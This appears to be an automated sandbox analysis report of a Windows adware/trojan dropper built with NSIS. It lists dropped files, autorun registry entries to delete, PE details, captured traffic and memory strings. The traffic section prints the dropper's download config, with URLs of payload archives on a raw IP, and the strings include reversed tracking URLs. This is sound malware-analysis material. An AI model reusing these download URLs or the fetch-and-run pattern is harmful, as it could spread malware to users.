%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÃÂÂÞ¸´.lnk (834 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\menu_buttons.bmp (920 bytes)
%Program Files%\KS2015010306\V21860\KS21860.exe (7192 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\wordlib\user.wlb (3 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÃÂÂÎÄ·ûºÅ.ini (560 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ë«Æ´.ini (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\öÃâ€ÂØ.lnk (621 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Æ´Òô¼Ó¼ÓË«Æ´.ini (538 bytes)
%System%\ksime.ime (126018 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\΢ÈÃÂÂË«Æ´.ini (682 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\phrase\õó¶ÌÓï¿â.ini (784 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ãâ€â€ÃƒÆ’â€ÂÈ»ÂëË«Æ´.ini (580 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzpy.dat (18424 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeWord.dll (1552 bytes)
%Program Files%\KS2015010306\V21860\atl100.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\KillProcDLL.dll (4 bytes)
%Program Files%\KS2015010306\V21860\config.exe (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshB9.tmp (285959 bytes)
%Program Files%\KS2015010306\V21860\Library.dll (5064 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeUnit.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\appbd.txt (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\ksimekusu_zhim_007.exe (229152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\Browser_V3.0.1354.0_r_4182_(Build14092214).exe (314625 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\CreateShortcut.exe (13850 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\Furt.exe (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\OneDay.exe (122112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshB3.tmp (19754 bytes)
%Documents and Settings%\%current user%\Desktop\Ó°ÊÓ´óÈ«.lnk (1 bytes)
%Program Files%\Favorite\ico\123.ico (3 bytes)
%Program Files%\Favorite\ico\360.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyB6.tmp (13218 bytes)
%Program Files%\Favorite\ico\tb1.ico (15 bytes)
%Program Files%\Favorite\ico\ay.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\hao123ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Program Files%\Favorite\ico\sg1.ico (9 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explroer.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\Ëѹ·ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\360ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\°®ÌÃâ€Â±¦.lnk (1 bytes)
%Program Files%\Favorite\ico\movie.ico (12536 bytes)
%Program Files%\Favorite\ico\ie.ico (784 bytes)
%Program Files%\Favorite\ico\23451.ico (9 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"KS21860.exe" = "%Program Files%\KS2015010306\V21860\KS21860.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KS21860.exe" = "%Program Files%\KS2015010306\V21860\KS21860.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name:
Product Name: traensparyent
Product Version:
Legal Copyright: ???? (C) 2014
Legal Trademarks:
Original Filename: traensparyent setup
Internal Name: traensparyent setup
File Version:
File Description:
Comments:
Language: Finnish (Finland)
Company Name: Product Name: traensparyentProduct Version: Legal Copyright: ???? (C) 2014Legal Trademarks: Original Filename: traensparyent setupInternal Name: traensparyent setupFile Version: File Description: Comments: Language: Finnish (Finland)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23488 | 23552 | 4.48909 | 7ebfade271f75cb4c180603ab653af42 |
| .rdata | 28672 | 4496 | 4608 | 3.59139 | 9d6e96915262c9d1129a16fa0b02a19a |
| .data | 36864 | 110456 | 1024 | 3.27356 | dbf10679c897d0edeee280fffdad552f |
| .ndata | 147456 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 188416 | 70104 | 70144 | 4.18344 | 2d96061016ef26c79c77b41870e3a397 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://www.baidu.traensparyent.com.moyan.cc/db/appbd.txt | 124.232.146.41 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /db/appbd.txt HTTP/1.0
Host: VVV.baidu.traensparyent.com.moyan.cc
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Length: 1660
Content-Type: text/plain
Last-Modified: Tue, 30 Dec 2014 06:12:52 GMT
Accept-Ranges: bytes
ETag: "eee11fa5f723d01:fe4"
Server: IIS
X-Powered-By: WAF/2.0
Date: Sat, 03 Jan 2015 09:53:19 GMT
Connection: close
/*Setting*/..[ff1]..aa=OneDay..bb=OneDay.exe..cc=hXXp://124.232.152.119:18168/db/OneDay.zip..dd=..[ff2]..aa=lnk..bb=CreateShortcut.exe..cc=http://124.232.152.119:18168/db/CreateShortcut.zip..dd=..[ff3]..aa=......bb=ksimekusu_zhim_007.exe..cc=hXXp://124.232.152.119:18168/db/ksimekusu_zhim_007.zip..dd=..[ff4]..aa=uc..bb=Browser_V3.0.1354.0_r_4182_(Build14092214).exe..cc=hXXp://124.232.152.119:18168/db/Browser_V3.0.1354.0_r_4182_(Build14092214).zip..dd=..[ff500]..aa=sd..bb=bgrhf_30279.exe..cc=hXXp://124.232.152.119:18168/db/bgrhf_30279.zip..dd=..[ff6]..aa=........bb=-2406_1_mp.exe..cc=hXXp://124.232.152.119:18168/db/-2406_1_mp.zip..dd=..[ff7]..aa=..............bb=jfzhzszm-1.exe..cc=hXXp://124.232.152.119:18168/db/jfzhzszm-1.zip..dd=..[ff700]..aa=....FM..bb=setup_2948-180095.exe..cc=hXXp://124.232.152.119:18168/db/setup_2948-180095.zip..dd=..[ff8]..aa=tqrl..bb=tqrl_93_2508.exe..cc=hXXp://124.232.152.119:18168/db/tqrl_93_2508.zip..dd=..[ff9]..aa=......bb=weather_b_90045.exe..cc=hXXp://124.232.152.119:18168/db/weather_b_90045.zip..dd=..[ff10]..aa=..........bb=apples_19_2508.exe..cc=hXXp://124.232.152.119:18168/db/apples_19_2508.zip..dd=..[ff11]..aa=......bb=xueba_v2.1.0.0_1013.exe..cc=hXXp://124.232.152.119:18168/db/xueba_v2.1.0.0_1013.zip..dd=..[ff12]..aa=......bb=xksd_50091169079.exe..cc=hXXp://124.232.152.119:18168/db/xksd_50091169079.zip..dd=..[ff13]..aa=......bb=zhezi_setup_Z853.exe..cc=hXXp://124.232.152.119:18168/db/zhezi_setup_Z853.zip..dd=..[ff14]..aa=......bb=CoolRAR1001.exe..cc=hXXp://124.232.152.119:18168
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1540:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
\LOCALS~1\Temp\nscB4.tmp\NSISdl.dll
\LOCALS~1\Temp\nscB4.tmp\NSISdl.dll
zhim_007.exe"
zhim_007.exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscB4.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscB4.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscB4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscB4.tmp
V3.0.1354.0_r_4182_(Build14092214).zip
V3.0.1354.0_r_4182_(Build14092214).zip
WS2_32.dll
WS2_32.dll
NSISdl.dll
NSISdl.dll
invalid URL
invalid URL
Host: %s
Host: %s
GET %s HTTP/1.0
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
User-Agent: NSISDL/1.2 (Mozilla)
http=
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u hours remaining)
(%u minutes remaining)
(%u minutes remaining)
(%u seconds remaining)
(%u seconds remaining)
Downloading %s
Downloading %s
KERNEL32.DLL
KERNEL32.DLL
comdlg32.dll
comdlg32.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
SHLWAPI.dll
SHLWAPI.dll
WININET.dll
WININET.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegEnumKeyW
RegEnumKeyW
.reloc
.reloc
.GHT,
.GHT,
QH.oY
QH.oY
appbd.txt
appbd.txt
_r_4182_(Build14092214).zip
_r_4182_(Build14092214).zip
14).exe
14).exe
2014.09.15.113236
2014.09.15.113236
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscB4.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscB4.tmp
c:\%original file name%.exe
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscB4.tmp\traensparyent
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscB4.tmp\traensparyent
%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshB2.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshB2.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Browser_V3.0.1354.0_r_4182_(Build14092214).exe
Browser_V3.0.1354.0_r_4182_(Build14092214).exe
hXXp://124.232.152.119:18168/db/Browser_V3.0.1354.0_r_4182_(Build14092214).zip
hXXp://124.232.152.119:18168/db/Browser_V3.0.1354.0_r_4182_(Build14092214).zip
Nullsoft Install System v2.46
Nullsoft Install System v2.46
FFR.D9DD.CN
FFR.D9DD.CN
2.0.0.1
2.0.0.1
FreeFastRecovery.exe
FreeFastRecovery.exe
KS21860.exe_136:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
E:\Calendar2.0.2.0\kssrf\code\build\x86\ksinput.pdb
E:\Calendar2.0.2.0\kssrf\code\build\x86\ksinput.pdb
SHLWAPI.dll
SHLWAPI.dll
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegOpenKeyW
RegOpenKeyW
RegCreateKeyW
RegCreateKeyW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
WININET.dll
WININET.dll
URLDownloadToFileW
URLDownloadToFileW
urlmon.dll
urlmon.dll
MSVCP100.dll
MSVCP100.dll
sqlite3_open
sqlite3_open
sqlite3_close
sqlite3_close
sqlite3_get_table
sqlite3_get_table
sqlite3_free
sqlite3_free
sqlite3_free_table
sqlite3_free_table
sqlite3_exec
sqlite3_exec
sqlite3.dll
sqlite3.dll
Library.dll
Library.dll
?OnKeyDown@WindowImplBase@DUILIB@@UAEJIIJAAH@Z
?OnKeyDown@WindowImplBase@DUILIB@@UAEJIIJAAH@Z
?GetMessageMap@WindowImplBase@DUILIB@@MBEPBUDUI_MSGMAP@2@XZ
?GetMessageMap@WindowImplBase@DUILIB@@MBEPBUDUI_MSGMAP@2@XZ
DirectUI.dll
DirectUI.dll
MSVCR100.dll
MSVCR100.dll
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
_crt_debugger_hook
_crt_debugger_hook
GetProcessHeap
GetProcessHeap
.?AVTable@SQLite@@
.?AVTable@SQLite@@
.?AVUTF8MBSTR@SQLite@@
.?AVUTF8MBSTR@SQLite@@
.?AVDatabase@SQLite@@
.?AVDatabase@SQLite@@
0#0*00060
0#0*00060
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%USER%
%USER%
ksinput.exe
ksinput.exe
config %d
config %d
config.exe
config.exe
3.0.3.9*%s*%s*%s*0*1*0*0*0
3.0.3.9*%s*%s*%s*0*1*0*0*0
3.0.3.9*%s*%s*%s*0*0*1*0*0
3.0.3.9*%s*%s*%s*0*0*1*0*0
php.ijgnot/moc.8szmx.jtfrs//:ptth
php.ijgnot/moc.8szmx.jtfrs//:ptth
%s?k=%s
%s?k=%s
select * from plugin where item=%d
select * from plugin where item=%d
n\plugin\plugin.db
n\plugin\plugin.db
CREATE TABLE "plugin" ("item" INTEGER PRIMARY KEY, "vers" INTEGER, "name" VARCHAR, "path" VARCHAR, "file" VARCHAR, "down" VARCHAR)
CREATE TABLE "plugin" ("item" INTEGER PRIMARY KEY, "vers" INTEGER, "name" VARCHAR, "path" VARCHAR, "file" VARCHAR, "down" VARCHAR)
%s%s%d.zip
%s%s%d.zip
update plugin set ver=%d, name='%s', path='%s', file='%s' down='%s' where item=%d
update plugin set ver=%d, name='%s', path='%s', file='%s' down='%s' where item=%d
insert into plugin(item,vers,name,path,file,down) values(%d,%d,'%s','%s','%s','%s')
insert into plugin(item,vers,name,path,file,down) values(%d,%d,'%s','%s','%s','%s')
update plugin set vers=%d, name='%s', path='%s', file='%s', down='%s' where item=%d
update plugin set vers=%d, name='%s', path='%s', file='%s', down='%s' where item=%d
php.gifnoc/moc.8szmx.afuruhs//:ptth
php.gifnoc/moc.8szmx.afuruhs//:ptth
%s?v=3.0.3.9&t=1&x=%s&c=%d
%s?v=3.0.3.9&t=1&x=%s&c=%d
20150103
20150103
3.0.3.9
3.0.3.9